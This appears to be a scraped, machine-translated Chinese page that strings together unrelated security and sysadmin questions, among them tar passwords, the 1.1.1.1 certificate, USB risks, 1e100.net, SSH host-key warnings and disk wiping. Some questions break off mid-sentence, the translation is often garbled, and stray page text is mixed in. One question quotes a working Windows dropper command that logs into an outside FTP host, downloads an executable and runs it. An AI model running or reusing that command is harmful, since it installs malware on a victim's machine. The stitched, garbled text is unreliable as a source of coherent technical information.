我想在 Ubuntu 10.04 上使用 tar 命令创建一些 tar.gz(可能还有 tar.bz2)文件。
我想用密码保护文件。
执行此操作的命令是什么(我在谷歌上搜索过,但没有发现任何显示如何使用密码创建和提取压缩文件的内容)。
任何人都知道如何做到这一点?
有几次我尝试在各种 Linux 机器上更改用户密码,当新密码与旧密码相似时,操作系统抱怨它们太相似了。
我一直在想,系统怎么知道这个?我认为密码保存为哈希。这是否意味着当系统能够比较新密码的相似性时,旧密码实际上被保存为纯文本?
当我访问https://1.1.1.1 时,我使用的任何网络浏览器都认为该 URL 是安全的。
这是谷歌浏览器显示的:
通常,当我尝试通过其 IP 地址访问 HTTPS 站点时,会收到如下安全警告:
根据我的理解,站点证书需要匹配域,但谷歌浏览器证书查看器没有显示1.1.1.1:
GoDaddy 的知识库文章“我可以申请内网名称或 IP 地址的证书吗?” 说:
否 - 我们不再接受 Intranet 名称或 IP 地址的证书请求。这是一项全行业标准,而不是特定于 GoDaddy 的标准。
(强调我的)
并且:
因此,自 2016 年 10 月 1 日起,证书颁发机构 (CA)必须撤销使用Intranet 名称或IP 地址的SSL 证书。
(强调我的)
和:
您应该重新配置服务器以使用完全限定域名 (FQDN),例如www.coolexample.com,而不是保护 IP 地址和 Intranet 名称。
(强调我的)
早在 2016 年 10 月 1 日的强制撤销日期之后,证书1.1.1.1已于 2018 …
假设有人要我将一些文件复制到他们的 U 盘。我正在运行完全修补的 Windows 7 x64,禁用自动运行(通过组策略)。我插入 USB 驱动器,在 Windows 资源管理器中打开它并将一些文件复制到其中。我不运行或查看任何现有文件。如果我这样做会发生什么坏事?
如果我在 Linux(例如 Ubuntu)中执行此操作会怎样?
请注意,我在寻找细节的特定风险(如果有的话),而不是“这将是安全的,如果你不这样做”。
我的家用电脑通常是开着的,但显示器是关着的。今晚我下班回家,发现看起来像是一次黑客攻击:在我的浏览器中,我的 Gmail 是打开的(那是我),但它处于撰写模式,在该TO字段中包含以下内容:
md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo 您已拥有
对我来说,这看起来像 Windows 命令行代码,并且代码的md开头加上 Gmail 处于撰写模式的事实,很明显有人试图运行cmd命令。我想我很幸运,我实际上没有在这台 PC 上运行 Windows,但我有其他人这样做。这是有史以来第一次这样的事情发生在我身上。我不是 Linux 专家,当时除了 Firefox 之外我没有运行任何其他程序。
我绝对确定这不是我写的,而且没有其他人在我的电脑旁。此外,我最近将我的 Google 密码(以及我的所有其他密码)更改为类似的内容,vMA8ogd7bv因此我不认为有人入侵了我的 Google 帐户。
刚刚发生了什么?当我的计算机不是运行恶意软件多年的老奶奶的旧 Windows 计算机,而是最近安装的新 Ubuntu 时,有人如何在我的计算机上敲击键盘?
更新:
让我解决一些要点和问题:
有很多网站谁是不是目前脆弱的,但我不知道,如果他们是在几天前脆弱。
例如:
我该怎么办?在重新发行之前不使用这些吗?我怎么知道他们用新密钥重新颁发证书?似乎我什至不应该登录这些网站来更改我的密码,因为无法知道它们是真正的网站。
我看到我的 PC 有 TCP 连接打开到1e100.net. 然后我查看了 whois 记录,发现它已注册到 Google。奇怪的。
快速搜索似乎表明它1e100.net非常受欢迎 -与 Alexaadobe.com或bbc.co.uk根据 Alexa 的覆盖范围大致相同- 但它到底是什么?我运行 Chrome,所以假设它可能与此有关,但为什么关于它的信息如此之少?
这个消息是什么意思?这是一个潜在的问题吗?渠道不安全?
或者这只是连接到新服务器时始终显示的默认消息?
过去我在使用 SSH 时经常看到这条消息:我总是以正常方式使用密码输入我的登录名,我感觉很好,因为我没有使用私钥/公钥(这更安全而不是短密码)。但是这次我已经为我与 bitbucket 的连接设置了一个带有 ssh 的公钥,但我仍然收到了消息。我知道最后的密码提示是一种不同的补充安全措施,用于解密私钥。
我希望有人可以对“无法确定真实性”消息的含义做出很好的解释。
The authenticity of host 'bitbucket.org (207.223.240.181)' can't be established.
RSA key fingerprint is 97:8c:1b:f2:6f:14:6b:5c:3b:ec:aa:46:46:74:7c:40.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'bitbucket.org,207.223.240.181' (RSA) to the list of
known hosts.
Enter passphrase for key '/c/Users/Steven/.ssh/id_rsa':
Run Code Online (Sandbox Code Playgroud) 我即将出售我的旧台式电脑,我对购买者可以获得我的一些敏感信息持谨慎态度,即使在使用数据恢复软件重新格式化硬盘之后也是如此。
如何安全地擦除硬盘驱动器,使其上的数据无法恢复?
尽管我特别需要 Windows PC 方面的帮助,但如果也有适用于 Mac 的建议也无妨。
从早上开始,我几乎在所有网站上都收到了奇怪的警告,包括unanalytics.com。

我很确定这只是谷歌浏览器的问题。确定的原因是,我也得到了这个http://localhost。
我想知道我们如何删除此警告。有人试图窃取数据吗?
这是我安装的扩展列表
谷歌浏览器版本:版本 66.0.3359.139(官方版本)(64 位)
操作系统: Ubuntu 14.04